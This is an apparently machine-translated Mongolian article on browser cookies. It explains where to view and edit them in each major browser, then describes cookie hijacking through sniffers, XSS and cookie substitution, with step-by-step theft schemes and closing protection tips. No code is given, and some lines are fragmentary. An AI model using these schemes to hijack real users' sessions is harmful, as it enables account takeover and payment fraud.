Одоо бидэнд жигнэмэг байна. Гэхдээ тэдэнтэй юу хийх вэ? Энэ нь энгийн, та тэдгээрийг өөрийнхөө оронд орлуулах хэрэгтэй. Opera хөтөч нь күүки засварлагчтай (хэрэгслүүд->дэвшилтэт->күүки менежмент), Firefox-д зориулсан залгаас байдаг (юу гэж нэрлэдгийг нь санахгүй байна, Google ашигла)
Энэ бол одоохондоо, магадгүй нийтлэлийг нэмж оруулах болно

Opera үндсэн цэсийг нээж, "Тохиргоо" хэсэгт очоод "Ерөнхий тохиргоо ..." мөрийг сонгоно уу. Эсвэл та зүгээр л CTRL + F12 товчийг дарж болно. Энэ нь хөтчийн тохиргооны цонхыг нээх бөгөөд "Нарийвчилсан" табын зүүн талын самбар дээрх "Күүки" хэсгийг дарах шаардлагатай. Үүний дотор та "Күүки удирдах" товчийг дарах хэрэгтэй.

Mozilla FireFox дээр цэсний "Хэрэгслүүд" хэсгийг нээгээд "Тохиргоо" -г сонгоно уу. Тохиргооны цонхонд та "Нууцлал" таб руу орж, "Күүки харуулах..." гэсэн товчийг олоод хөтчийн хадгалсан күүки жагсаалт руу орохын тулд үүн дээр дарна уу. Та тэдгээрийг эндээс хайж, үзэх боломжтой.

Internet Explorer дээр цэсний "Хэрэгслүүд" хэсгийг өргөжүүлж, "Properties" -ийг сонгоно уу. "Properties" тохиргооны цонхонд "Ерөнхий" таб руу очиж, "Харах түүх" хэсэгт байрлах "Сонголтууд" товчийг дарна уу. Ингэснээр та өөр цонхыг нээх болно ("Түр файлын сонголтууд"), та "Файл харуулах" товчийг дарах хэрэгтэй.

Нээгдэх Internet Explorer-ийн түр файл хадгалах хавтасны агуулгын жагсаалтын "Нэр" гэсэн гарчиг дээр дарж, ингэснээр та бүх күүки файлуудыг нэг төрлийн бус файлуудын нийтлэг овоолгын нэг блок болгон бүлэглэж болно. Эндээс та сонирхож буй файлаа олж, стандарт тэмдэглэлийн дэвтэр дээр нээж үзэх эсвэл засах боломжтой.

Google Chrome дээр цонхны баруун дээд буланд байгаа эрэг чангалах түлхүүр дүрс дээр товшоод цэснээс Сонголтуудыг сонгоно уу. Хөтөч нь "Тохиргоо" хуудсыг нээх бөгөөд та зүүн талын самбар дээрх "Нарийвчилсан" холбоос дээр дарж, нэмэлт тохиргооны хуудасны "Агуулгын тохиргоо" товчийг дарна уу. Энэ бол энэ хөтчийн хадгалсан күүки рүү очих сүүлчийн хуудас биш юм.

Дараагийн хуудсан дээрх "Бүх күүки ба сайтын өгөгдөл" товчийг дарснаар та күүки жагсаалтад хандах боломжтой болно.

Google Chrome нь күүкиг хайх, үзэх, устгах боломжийг олгодог.

Safari хөтөч дээр баруун дээд буланд байрлах арааны дүрс дээр товшоод "Тохиргоо ..." -г сонгоно уу. Тохиргоог өөрчлөх цонхонд та "Аюулгүй байдал" таб руу очиж "Күүки харуулах" товчийг дарна уу. Safari нь зөвхөн күүки хайх, устгах функцээр хангадаг бөгөөд эдгээр түр зуурын файлуудын агуулгыг зөвхөн хэсэгчлэн харах боломжтой.

Күүки- вэб сайтаас хэрэглэгчийн компьютер дээр хадгалсан текст файл хэлбэрээр мэдээлэл. Баталгаажуулалтын өгөгдөл (нэвтрэх/нууц үг, ID, утасны дугаар, шуудангийн хайрцагны хаяг), хэрэглэгчийн тохиргоо, хандалтын төлөв зэргийг агуулна. Хөтөчийн профайлд хадгалагдсан.

Күүки хакердахЭнэ нь вэб нөөцийн зочдын сессийг хулгайлах (эсвэл "хулгайлах") юм. Хувийн мэдээлэл нь зөвхөн илгээгч, хүлээн авагчид төдийгүй гуравдагч этгээд буюу саатуулах ажиллагааг гүйцэтгэсэн этгээдэд нээлттэй болно.

Күүки хакердах хэрэгсэл, арга техник

Компьютерийн хулгайчид бодит амьдрал дээрх хамт ажиллагсдынхаа нэгэн адил ур чадвар, авхаалж самбаа, мэдлэгээс гадна өөрийн гэсэн хэрэгсэлтэй байдаг - мастер түлхүүр, датчикийн нэг төрлийн зэвсэг. Хакеруудын интернет хэрэглэгчдээс күүки задлахад ашигладаг хамгийн алдартай заль мэхийг харцгаая.

Үнэрчид

Сүлжээний урсгалыг хянах, дүн шинжилгээ хийх тусгай програмууд. Тэдний нэр нь англи хэлний "sniff" (sniff) үйл үгнээс гаралтай, учир нь. зангилааны хооронд дамжуулагдсан пакетуудыг шууд утгаараа "үнэрлэх".

Гэвч халдагчид сессийн өгөгдөл, мессеж болон бусад нууц мэдээллийг таслан зогсоохын тулд sniffer ашигладаг. Тэдний халдлагын бай нь ихэвчлэн хамгаалалтгүй сүлжээнүүд бөгөөд күүки нь нээлттэй HTTP сессээр илгээгддэг, өөрөөр хэлбэл тэдгээр нь бараг шифрлэгдээгүй байдаг. (Олон нийтийн Wi-Fi нь энэ тал дээр хамгийн эмзэг байдаг.)

Хэрэглэгчийн зангилаа болон вэб серверийн хооронд Интернэт сувагт sniffer оруулахын тулд дараах аргуудыг ашигладаг.

• Сүлжээний интерфейсийг "сонсох" (төв, шилжүүлэгч);
• урсгалыг салбарлах, хуулбарлах;
• сүлжээний сувгийн цоорхойд холбогдох;
• хохирогчийн урсгалыг үнэрлэгч рүү чиглүүлдэг тусгай дайралтаар дамжуулан дүн шинжилгээ хийх (MAC хууран мэхлэх, IP хуурамчаар үйлдэх).

XSS товчлол нь Cross Site Scripting гэсэн үг юм. Хэрэглэгчийн мэдээллийг хулгайлах зорилгоор вэб сайт руу дайрахад ашигладаг.

XSS-ийн зарчим дараах байдалтай байна.

• халдагч нь вэбсайт, форумын вэб хуудас эсвэл мессеж рүү хортой код (тусгай далдлагдсан скрипт) оруулдаг (жишээлбэл, нийгмийн сүлжээнд харилцах үед);
• хохирогч халдвар авсан хуудас руу орж, компьютер дээрээ суулгасан кодыг идэвхжүүлдэг (товших, холбоосыг дагаж мөрдөх гэх мэт);
• Хариуд нь гүйцэтгэсэн хортой код нь хэрэглэгчийн нууц мэдээллийг хөтчөөс (ялангуяа күүки) "худалдаг" бөгөөд халдагчийн вэб сервер рүү илгээдэг.

Програм хангамжийн XSS механизмыг "суулгах" тулд хакерууд вэб сервер, онлайн үйлчилгээ, хөтчүүдийн бүх төрлийн эмзэг байдлыг ашигладаг.

XSS-ийн бүх эмзэг байдлыг хоёр төрөлд хуваадаг.

• Идэвхгүй.Довтолгоог вэб хуудсан дээр тусгай скриптийг хүсэх замаар олж авдаг. Хортой кодыг вэб хуудасны янз бүрийн хэлбэрт оруулах боломжтой (жишээлбэл, сайтын хайлтын талбарт). Идэвхгүй XSS-д хамгийн өртөмтгий нь өгөгдөл ирэх үед HTML хаягуудыг шүүдэггүй нөөцүүд юм;
• Идэвхтэй.Шууд сервер дээр байрладаг. Мөн тэд хохирогчийн хөтөч дээр идэвхжсэн. Эдгээрийг бүх төрлийн блог, чат, мэдээний сувгууд дээр луйварчид идэвхтэй ашигладаг.

Хакерууд XSS скриптүүдийг болгоомжтой "өнгөлөн далдалдаг" бөгөөд ингэснээр хохирогч юу ч сэжиглэхгүй байх болно. Тэд файлын өргөтгөлийг өөрчилж, кодыг дүрс болгон дамжуулж, линкийг дагахад нь урам зориг өгч, сонирхолтой контентоор тэднийг татдаг. Үүний үр дүнд: өөрийн сониуч зангаа хянах чадваргүй компьютерийн хэрэглэгч өөрийн гараар (хулганы товшилтоор) сеансын күүки (нэвтрэх болон нууц үгээр) XSS скриптийн зохиогч - компьютерийн муу санаатан руу илгээдэг.

Күүки орлуулах

Бүх күүки хадгалагдаж, ямар ч өөрчлөлтгүйгээр вэб сервер рүү (түүнээс "ирсэн") илгээгддэг - анхны хэлбэрээрээ - ижил утгууд, мөрүүд болон бусад өгөгдөлтэй. Тэдний параметрүүдийг зориудаар өөрчлөхийг күүки орлуулах гэж нэрлэдэг. Өөрөөр хэлбэл, жигнэмэгийг солихдоо халдлага үйлдэгч нь хүсэл эрмэлзэлтэй дүр эсгэдэг. Жишээлбэл, онлайн дэлгүүрт төлбөр хийхдээ күүки төлбөрийн хэмжээг бууруулж өөрчилдөг тул худалдан авалтад "хадгалах" болно.

Нийгмийн сүлжээн дэх өөр хэн нэгний данснаас хулгайлагдсан сессийн күүкиг өөр сесс болон өөр компьютерт "оруулах" болно. Хулгайлагдсан күүки эзэмшигч нь хохирогчийн дансанд (харилцаа, агуулга, хуудасны тохиргоо) бүрэн хандах эрхтэй бөгөөд тэр өөрийн хуудсан дээр байх болно.

"Засварлах" күүки нь дараахь зүйлийг ашиглан хийгддэг.

• Opera хөтөч дээрх "күүки удирдах..." функцууд;
• FireFox-д зориулсан күүки менежер болон дэвшилтэт күүки менежер нэмэлтүүд;
• IECookiesView хэрэгслүүд (зөвхөн Internet Explorer);
• AkelPad, NotePad эсвэл Windows Notepad зэрэг текст засварлагч.

Өгөгдөл рүү физик хандалт

Хэд хэдэн алхамаас бүрдэх маш энгийн хэрэгжүүлэх схем. Гэхдээ энэ нь нээлттэй сесс бүхий хохирогчийн компьютерийг, жишээлбэл ВКонтакте-г хараа хяналтгүй орхисон тохиолдолд л үр дүнтэй байдаг (мөн удаан хугацаанд!):

Хадгалсан бүх күүкиг харуулахын тулд хөтчийн хаягийн мөрөнд javascript функцийг оруулсан болно.

"ENTER" товчийг дарсны дараа бүгд хуудсан дээр гарч ирнэ.

Күүкийг хуулж, файлд хадгалж, дараа нь флаш диск рүү шилжүүлдэг.

Өөр компьютер дээр күүки шинэ сессээр солигддог.

Хохирогчийн данс руу нэвтрэх эрхийг олгосон.

Дүрмээр бол хакерууд дээрх хэрэгслүүдийг (+ бусад) хослуулан (олон вэб нөөцийн хамгаалалтын түвшин нэлээд өндөр байдаг тул) болон тусад нь (хэрэглэгчид хэт гэнэн байх үед) ашигладаг.

XSS + үнэрлэгч

XSS скриптийг үүсгэсэн бөгөөд энэ нь онлайн үнэрлэгчийн хаягийг (гэрээр хийсэн эсвэл тодорхой үйлчилгээ) зааж өгдөг.

Хортой кодыг .img (зургийн формат) өргөтгөлөөр хадгалдаг.

Дараа нь энэ файлыг вэбсайтын хуудас, чат эсвэл хувийн мессеж рүү байршуулна - халдлага хийх газар.

Хэрэглэгчийн анхаарлыг бий болгосон "хавх"-д татдаг (энэ нь нийгмийн инженерчлэл хүчин төгөлдөр болдог).

Хэрэв хавх идэвхжсэн бол хохирогчийн хөтчийн күүкиг үнэрлэгч таслан зогсооно.

Халдагч нь үнэрлэгчийн бүртгэлийг нээж, хулгайлсан жигнэмэгийг олж авдаг.

Дараа нь дээрх хэрэгслийг ашиглан данс эзэмшигчийн эрхийг олж авахын тулд орлуулах ажлыг гүйцэтгэдэг.

Күүкийг хакердахаас хамгаалах

Шифрлэгдсэн холболтыг ашиглана уу (тохирох протокол болон аюулгүй байдлын аргыг ашиглан).

"Шинэ үнэгүй програм хангамж"-тай танилцах гэсэн эргэлзээтэй холбоос, зураг, уруу таталтанд хариу өгөх хэрэггүй. Ялангуяа танихгүй хүмүүсээс.

Зөвхөн итгэмжлэгдсэн вэб нөөцийг ашигла.

Зөвшөөрөгдсөн сессийг "Гарах" товчийг дарж дуусгана уу (зөвхөн табыг хаах биш!). Ялангуяа та хувийн компьютерээс биш, жишээлбэл, интернет кафе дахь компьютерээс бүртгэлдээ нэвтэрсэн бол.

Хөтөчийн "Нууц үгээ хадгалах" функцийг бүү ашигла. Хадгалсан бүртгэлийн мэдээлэл нь хулгайн эрсдэлийг ихээхэн нэмэгдүүлдэг. Залхуурах хэрэггүй, сесс бүрийн эхэнд нууц үгээ оруулж, нэвтэрч ороход хэдэн минут зарцуулж болохгүй.

Вэбээр аялсны дараа - нийгмийн сүлжээ, форум, чат, вэбсайтад зочилсны дараа хадгалсан күүкийг устгаж, хөтчийн кэшийг цэвэрлэ.

Хөтөч болон вирусны эсрэг программ хангамжийг тогтмол шинэчил.

XSS халдлагаас хамгаалах хөтчийн өргөтгөлүүдийг ашиглана уу (жишээлбэл, FF болон Google Chrome-д зориулсан NoScript).

Үе үе дансанд.

Хамгийн гол нь амарч байхдаа эсвэл интернетэд ажиллаж байхдаа сонор сэрэмж, анхаарал бүү алдаарай!